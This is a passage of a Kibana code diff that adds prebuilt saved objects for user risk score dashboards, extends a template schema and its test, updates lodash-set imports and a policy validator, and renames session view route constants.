'{"signal.rule.type":{"count":1},"host.name":{"count":1},"signal.rule.name":{"count":1}}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: '.siem-signals-', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: 'siem-signals-default-index-pattern', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"user.name: root","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', + }, + title: 'Associated Users (Rule Breakdown)', + uiStateJSON: '{}', + version: 1, + visState: + '{"title":"Associated Users (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score","emptyAsNull":false},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of Hits","emptyAsNull":false},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"user.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"User"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":25,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true,"autoFitRowToContent":true}}', + }, + coreMigrationVersion: '8.3.0', + id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', + migrationVersion: { visualization: '8.3.0' }, + references: [ + { + id: 'siem-signals-default-index-pattern', + name: 'kibanaSavedObjectMeta.searchSourceJSON.index', + type: 'index-pattern', + }, + ], + type: 'visualization', + updated_at: '2022-06-22T22:01:24.771Z', + }, + { + attributes: { + description: '', + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', + }, + title: 'Alerts by Hostname', + uiStateJSON: '{}', + version: 1, + visState: + '{"title":"Host Risk Score (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score"},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"host.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Host"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', + }, + coreMigrationVersion: '8.3.0', + id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', + migrationVersion: { visualization: '8.3.0' }, + references: [ + { + id: 'siem-signals-default-index-pattern', + name: 'kibanaSavedObjectMeta.searchSourceJSON.index', + type: 'index-pattern', + }, + ], + type: 'visualization', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"not user.name : *$","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', + }, + title: 'User Risk Score (Tactic Breakdown)- Verbose', + uiStateJSON: '{}', + version: 1, + visState: + '{"title":"User Risk Score (Tactic Breakdown)- Verbose","type":"table","aggs":[{"id":"1","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"user.name","orderBy":"1","order":"desc","size":40,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Username"},"schema":"split"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.tactic.name","orderBy":"1","order":"desc","size":100,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Tactic"},"schema":"bucket"},{"id":"6","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.technique.name","orderBy":"1","order":"desc","size":100,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Technique"},"schema":"bucket"},{"id":"7","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true,"autoFitRowToContent":false}}', + }, + coreMigrationVersion: '8.3.0', + id: '183d32f0-9a5e-11ec-90d3-1109ed409ab5', + migrationVersion: { visualization: '8.3.0' }, + references: [ + { + id: 'siem-signals-default-index-pattern', + name: 'kibanaSavedObjectMeta.searchSourceJSON.index', + type: 'index-pattern', + }, + ], + type: 'visualization', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { color: '#D36086', description: '', name: 'experimental' }, + coreMigrationVersion: '8.3.0', + id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', + migrationVersion: { tag: '8.0.0' }, + references: [], + type: 'tag', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { color: '#8aa96b', description: '', name: 'release' }, + coreMigrationVersion: '8.3.0', + id: '2d22b2c0-feb0-11eb-bac9-4d64e825480b', + migrationVersion: { tag: '8.0.0' }, + references: [], + type: 'tag', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: + 'This dashboard allows users to drill down further into the details of the risk components associated with a particular user.', + hits: 0, + kibanaSavedObjectMeta: { + searchSourceJSON: '{"query":{"query":"","language":"kuery"},"filter":[]}', + }, + optionsJSON: '{"hidePanelTitles":false,"useMargins":true}', + panelsJSON: + '[{"version":"8.3.0","type":"visualization","gridData":{"x":0,"y":0,"w":48,"h":3,"i":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195"},"panelIndex":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195","embeddableConfig":{"savedVis":{"title":"","description":"","type":"markdown","params":{"fontSize":12,"openLinksInNewTab":false,"markdown":"The User Risk Score capability is an experimental feature. You can read further about it [here]"},"uiState":{},"data":{"aggs":[],"searchSource":{"query":{"query":"","language":"kuery"},"filter":[]}}},"hidePanelTitles":true,"enhancements":{},"type":"visualization"}},{"version":"8.0.0","type":"lens","gridData":{"x":0,"y":3,"w":48,"h":15,"i":"b3fdccab-59c1-47c8-9393-fa043e0dff83"},"panelIndex":"b3fdccab-59c1-47c8-9393-fa043e0dff83","embeddableConfig":{"enhancements":{}},"panelRefName":"panel_b3fdccab-59c1-47c8-9393-fa043e0dff83"},{"version":"8.0.0","type":"visualization","gridData":{"x":0,"y":18,"w":26,"h":65,"i":"8d09b97c-a023-4b7e-9e9d-1c46e726a487"},"panelIndex":"8d09b97c-a023-4b7e-9e9d-1c46e726a487","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"593ff0e6-25da-47ad-b81d-9a0106c0e9aa","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to User View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false,"vis":{"params":{"colWidth":[{"colIndex":0,"width":410.5}]}}},"title":"Alert Counts by User","panelRefName":"panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487"},{"version":"8.0.0","type":"visualization","gridData":{"x":26,"y":18,"w":22,"h":65,"i":"cae82aa1-20c8-4354-94ab-3934ac53b8fe"},"panelIndex":"cae82aa1-20c8-4354-94ab-3934ac53b8fe","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"0fd43778-bd5d-4b2b-85c3-47ac3b756434","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to User View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false,"vis":{"params":{"colWidth":[{"colIndex":0,"width":304}]}}},"title":"Alert Counts by Host","panelRefName":"panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe"},{"version":"8.0.0","type":"visualization","gridData":{"x":0,"y":83,"w":48,"h":15,"i":"ca3c8903-be5d-4265-820c-cc3d67443af2"},"panelIndex":"ca3c8903-be5d-4265-820c-cc3d67443af2","embeddableConfig":{"enhancements":{}},"panelRefName":"panel_ca3c8903-be5d-4265-820c-cc3d67443af2"}]', + timeRestore: false, + title: 'Drilldown of User Risk Score', + version: 1, + }, + coreMigrationVersion: '8.3.0', + id: '1355b030-ca2b-11ec-962f-a3a018b7d10f', + migrationVersion: { dashboard: '8.3.0' }, + references: [ + { + id: '60454070-9a5d-11ec-9633-5f782d122340', + name: 'b3fdccab-59c1-47c8-9393-fa043e0dff83:panel_b3fdccab-59c1-47c8-9393-fa043e0dff83', + type: 'lens', + }, + { + id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', + name: '8d09b97c-a023-4b7e-9e9d-1c46e726a487:panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487', + type: 'visualization', + }, + { + id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', + name: 'cae82aa1-20c8-4354-94ab-3934ac53b8fe:panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe', + type: 'visualization', + }, + { + id: '183d32f0-9a5e-11ec-90d3-1109ed409ab5', + name: 'ca3c8903-be5d-4265-820c-cc3d67443af2:panel_ca3c8903-be5d-4265-820c-cc3d67443af2', + type: 'visualization', + }, + { + id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', + name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', + type: 'tag', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 'tag-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + { + id: '2d22b2c0-feb0-11eb-bac9-4d64e825480b', + name: 'tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b', + type: 'tag', + }, + ], + type: 'dashboard', + updated_at: '2022-06-22T21:55:26.622Z', + }, + { + attributes: { + fieldAttrs: '{}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: '.siem-signals-', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: '6a98e860-f264-11ec-b875-8dd104de3c0f', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T19:49:24.075Z', + }, + { + attributes: { + fieldAttrs: '{"user.name":{"count":1}}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: 'ml_user_risk_score_latest_default', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: '0edd6710-cfd4-11ec-962f-a3a018b7d10f', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + state: { + datasourceStates: { + indexpattern: { + layers: { + '4fd27c60-031c-4cd6-9cc3-42eba11e4dc5': { + columnOrder: [ + 'a56deeb6-7001-42a3-80bf-d0d4cd389864', + 'f78c300e-883b-469b-bc12-c1bd1a3567c9', + 'd54be677-903e-45f4-8218-8e21fbcc692e', + ], + columns: { + 'a56deeb6-7001-42a3-80bf-d0d4cd389864': { + dataType: 'string', + isBucketed: true, + label: 'Top values of user.name', + operationType: 'terms', + params: { + missingBucket: false, + orderBy: { columnId: 'd54be677-903e-45f4-8218-8e21fbcc692e', type: 'column' }, + orderDirection: 'desc', + otherBucket: true, + parentFormat: { id: 'terms' }, + size: 100, + }, + scale: 'ordinal', + sourceField: 'user.name', + }, + 'd54be677-903e-45f4-8218-8e21fbcc692e': { + dataType: 'number', + isBucketed: false, + label: 'Sum of risk_stats.risk_score', + operationType: 'sum', + scale: 'ratio', + sourceField: 'risk_stats.risk_score', + }, + 'f78c300e-883b-469b-bc12-c1bd1a3567c9': { + dataType: 'string', + isBucketed: true, + label: 'Top values of risk.keyword', + operationType: 'terms', + params: { + missingBucket: false, + orderBy: { columnId: 'd54be677-903e-45f4-8218-8e21fbcc692e', type: 'column' }, + orderDirection: 'desc', + otherBucket: true, + parentFormat: { id: 'terms' }, + size: 3, + }, + scale: 'ordinal', + sourceField: 'risk.keyword', + }, + }, + incompleteColumns: {}, + }, + }, + }, + }, + filters: [ + { + $state: { store: 'appState' }, + meta: { + alias: null, + disabled: false, + index: '915f434c-c7d6-4813-be8a-620ce7b2bfab', + key: 'risk.keyword', + negate: true, + params: { query: 'Unknown' }, + type: 'phrase', + }, + query: { match_phrase: { 'risk.keyword': 'Unknown' } }, + }, + ], + query: { language: 'kuery', query: '' }, + visualization: { + columns: [ + { columnId: 'a56deeb6-7001-42a3-80bf-d0d4cd389864', isTransposed: false }, + { columnId: 'f78c300e-883b-469b-bc12-c1bd1a3567c9', isTransposed: false }, + { columnId: 'd54be677-903e-45f4-8218-8e21fbcc692e', hidden: true, isTransposed: false }, + ], + layerId: '4fd27c60-031c-4cd6-9cc3-42eba11e4dc5', + layerType: 'data', + rowHeight: 'single', + rowHeightLines: 1, + }, + }, + title: 'Current Risk Score For Users', + visualizationType: 'lnsDatatable', + }, + coreMigrationVersion: '8.3.0', + id: '3b1fd7f0-d52d-11ec-b370-e3adc339bc8c', + migrationVersion: { lens: '8.3.0' }, + references: [ + { + id: '0edd6710-cfd4-11ec-962f-a3a018b7d10f', + name: 'indexpattern-datasource-layer-4fd27c60-031c-4cd6-9cc3-42eba11e4dc5', + type: 'index-pattern', + }, + { + id: '0edd6710-cfd4-11ec-962f-a3a018b7d10f', + name: '915f434c-c7d6-4813-be8a-620ce7b2bfab', + type: 'index-pattern', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 'tag-ref-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + ], + type: 'lens', + updated_at: '2022-06-22T22:07:54.553Z', + }, + { + attributes: { + description: '', + hits: 0, + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"","language":"kuery"},"filter":[{"meta":{"negate":true,"type":"phrase","key":"risk.keyword","params":{"query":"Unknown"},"disabled":true,"alias":null,"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index"},"query":{"match_phrase":{"risk.keyword":"Unknown"}},"$state":{"store":"appState"}}]}', + }, + optionsJSON: '{"useMargins":true,"syncColors":false,"hidePanelTitles":false}', + panelsJSON: + '[{"version":"8.0.0","type":"lens","gridData":{"x":11,"y":0,"w":25,"h":32,"i":"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6"},"panelIndex":"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"299d13ec-93f5-48ce-a98d-cf7aeeca37d6","triggers":["FILTER_TRIGGER"],"action":{"factoryId":"DASHBOARD_TO_DASHBOARD_DRILLDOWN","name":"Go to Dashboard","config":{"useCurrentFilters":true,"useCurrentDateRange":true}}}]}}},"panelRefName":"panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6"}]', + timeRestore: false, + title: 'Current Risk Score For Users', + version: 1, + }, + coreMigrationVersion: '8.3.0', + id: '065c6df0-d530-11ec-b370-e3adc339bc8c', + migrationVersion: { dashboard: '8.3.0' }, + references: [ + { + id: '6a98e860-f264-11ec-b875-8dd104de3c0f', + name: 'kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index', + type: 'index-pattern', + }, + { + id: '3b1fd7f0-d52d-11ec-b370-e3adc339bc8c', + name: '359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6', + type: 'lens', + }, + { + id: '1355b030-ca2b-11ec-962f-a3a018b7d10f', + name: '359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:drilldown:DASHBOARD_TO_DASHBOARD_DRILLDOWN:299d13ec-93f5-48ce-a98d-cf7aeeca37d6:dashboardId', + type: 'dashboard', + }, + { + id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', + name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', + type: 'tag', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 'tag-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + { + id: '2d22b2c0-feb0-11eb-bac9-4d64e825480b', + name: 'tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b', + type: 'tag', + }, + ], + type: 'dashboard', + updated_at: '2022-06-22T21:55:26.622Z', + }, +]; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts index 4cbbf6a63ed90..2a7d221bf610a 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts @@ -14,9 +14,14 @@ describe('createPrebuiltSavedObjectsSchema', () => { ).toThrow(); }); - it.each([['hostRiskScoreDashboards']])('should allow template %p', async (template) => { - expect(createPrebuiltSavedObjectsSchema.params.validate({ template_name: template })).toEqual({ - template_name: template, - }); - }); + it.each([['hostRiskScoreDashboards', 'userRiskScoreDashboards']])( + 'should allow template %p', + async (template) => { + expect(createPrebuiltSavedObjectsSchema.params.validate({ template_name: template })).toEqual( + { + template_name: template, + } + ); + } + ); }); diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts index e5c5d0fc298e9..9a2ea0964ea57 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts @@ -9,6 +9,9 @@ import { schema } from '@kbn/config-schema'; export const createPrebuiltSavedObjectsSchema = { params: schema.object({ - template_name: schema.oneOf([schema.literal('hostRiskScoreDashboards')]), + template_name: schema.oneOf([ + schema.literal('hostRiskScoreDashboards'), + schema.literal('userRiskScoreDashboards'), + ]), }), }; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts index c3c65a6318dbf..172634e1a7652 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts @@ -5,4 +5,4 @@ * 2.0. */ -export type SavedObjectTemplate = 'hostRiskScoreDashboards'; +export type SavedObjectTemplate = 'hostRiskScoreDashboards' | 'userRiskScoreDashboards'; diff --git a/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts b/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts index 0d5cf7684f02b..97b6ec743d109 100644 --- a/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts +++ b/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts @@ -5,7 +5,7 @@ * 2.0. */ import type * as rt from 'io-ts'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import readline from 'readline'; import fs from 'fs'; import type { Readable } from 'stream'; diff --git a/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts b/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts index c97f7053a5098..fa9c9250e2190 100644 --- a/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts +++ b/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import type { SavedObject, diff --git a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts index d149b8c0fd7ba..a1918b628c1d4 100644 --- a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts +++ b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts @@ -144,12 +144,7 @@ describe('When using Artifacts Exceptions BaseValidator', () => { }); it('should throw if policy ids for by policy artifacts are not valid', async () => { - packagePolicyService.getByIDs.mockResolvedValue([ - { - id: '123', - version: undefined, - } as PackagePolicy, - ]); + packagePolicyService.getByIDs.mockResolvedValue([]); await expect(initValidator()._validateByPolicyItem(exceptionLikeItem)).rejects.toBeInstanceOf( EndpointArtifactExceptionValidationError diff --git a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts index 04a7d5a09875b..872d8da7cdb3d 100644 --- a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts +++ b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts @@ -131,7 +131,9 @@ export class BaseValidator { return; } - const policiesFromFleet = await packagePolicy.getByIDs(internalReadonlySoClient, policyIds); + const policiesFromFleet = await packagePolicy.getByIDs(internalReadonlySoClient, policyIds, { + ignoreMissing: true, + }); if (!policiesFromFleet) { throw new EndpointArtifactExceptionValidationError( @@ -139,9 +141,9 @@ export class BaseValidator { ); } - const invalidPolicyIds = policiesFromFleet - .filter((policy) => policy.version === undefined) - .map((policy) => policy.id); + const invalidPolicyIds = policyIds.filter( + (policyId) => !policiesFromFleet.some((policy) => policyId === policy.id) + ); if (invalidPolicyIds.length) { throw new EndpointArtifactExceptionValidationError( diff --git a/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts b/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts index a20e5aba9fda1..f44ad77e67929 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts @@ -6,7 +6,7 @@ */ import { mapValues, isObject, isArray } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { toArray } from '../../../common/utils/to_array'; import { isGeoField } from '../../../common/utils/field_formatters'; diff --git a/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts b/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts index d0a9991f866db..f40edfc5914df 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, isEmpty } from 'lodash/fp'; import { toObjectArrayOfStrings } from '../../../common/utils/to_array'; diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts index 3e92a733d12bd..93ce3a15009b7 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { get, has } from 'lodash/fp'; import { hostFieldsMap } from '../../../../../../common/ecs/ecs_fields'; import type { diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts index 3f2a052ffc1b1..0c1ef643e663f 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { get, has, head } from 'lodash/fp'; import type { IScopedClusterClient, diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts index 15d1b3029a96d..3cae17446439f 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts @@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import type { ProcessHits, diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts index 60cd570478488..53623d44205b3 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts @@ -6,7 +6,7 @@ */ import { get, getOr, isEmpty } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { toObjectArrayOfStrings } from '../../../../../../common/utils/to_array'; import { sourceFieldsMap, hostFieldsMap } from '../../../../../../common/ecs/ecs_fields'; import type { diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts index cf18f08476fcd..f6c9f1d194215 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { get, has } from 'lodash/fp'; import type { UserAggEsItem, diff --git a/x-pack/plugins/session_view/common/constants.ts b/x-pack/plugins/session_view/common/constants.ts index 371a54418c9b7..5bf0dc53701fc 100644 --- a/x-pack/plugins/session_view/common/constants.ts +++ b/x-pack/plugins/session_view/common/constants.ts @@ -5,35 +5,46 @@ * 2.0. */ -export const PROCESS_EVENTS_ROUTE = '/internal/session_view/process_events_route'; -export const ALERTS_ROUTE = '/internal/session_view/alerts_route'; -export const ALERT_STATUS_ROUTE = '/internal/session_view/alert_status_route'; -export const SESSION_ENTRY_LEADERS_ROUTE = '/internal/session_view/session_entry_leaders_route'; +// routes +export const PROCESS_EVENTS_ROUTE = '/internal/session_view/process_events'; +export const ALERTS_ROUTE = '/internal/session_view/alerts'; +export const ALERT_STATUS_ROUTE = '/internal/session_view/alert_status'; +export const IO_EVENTS_ROUTE = '/internal/session_view/io_events'; +export const GET_TOTAL_IO_BYTES_ROUTE = '/internal/session_view/get_total_io_bytes'; + +// index patterns export const PROCESS_EVENTS_INDEX = '*:logs-endpoint.events.process*,logs-endpoint.events.process*'; // match on both cross cluster and local indices export const PREVIEW_ALERTS_INDEX = '.preview.alerts-security.alerts-default'; + +// field properties export const ENTRY_SESSION_ENTITY_ID_PROPERTY = 'process.entry_leader.entity_id'; export const ALERT_UUID_PROPERTY = 'kibana.alert.uuid'; export const ALERT_ORIGINAL_TIME_PROPERTY = 'kibana.alert.original_time'; -export const ALERT_STATUS = { - OPEN: 'open', - ACKNOWLEDGED: 'acknowledged', - CLOSED: 'closed', -}; +export const TOTAL_BYTES_CAPTURED_PROPERTY = 'process.io.total_bytes_captured'; +// page sizes export const PROCESS_EVENTS_PER_PAGE = 500; export const ALERTS_PER_PROCESS_EVENTS_PAGE = 1500; export const ALERTS_PER_PAGE = 100; -export const ALERTS_IN_FIRST_PAGE = 8; - -// when showing the count of alerts in details panel tab, if the number -// exceeds ALERT_COUNT_THRESHOLD we put a + next to it, e.g 500+ -export const ALERT_COUNT_THRESHOLD = 500; +export const IO_EVENTS_PER_PAGE = 2; // react-query caching keys export const QUERY_KEY_PROCESS_EVENTS = 'sessionViewProcessEvents'; export const QUERY_KEY_ALERTS = 'sessionViewAlerts'; -export const LOCAL_STORAGE_DISPLAY_OPTIONS_KEY = 'sessionView:displayOptions'; +export const QUERY_KEY_IO_EVENTS = 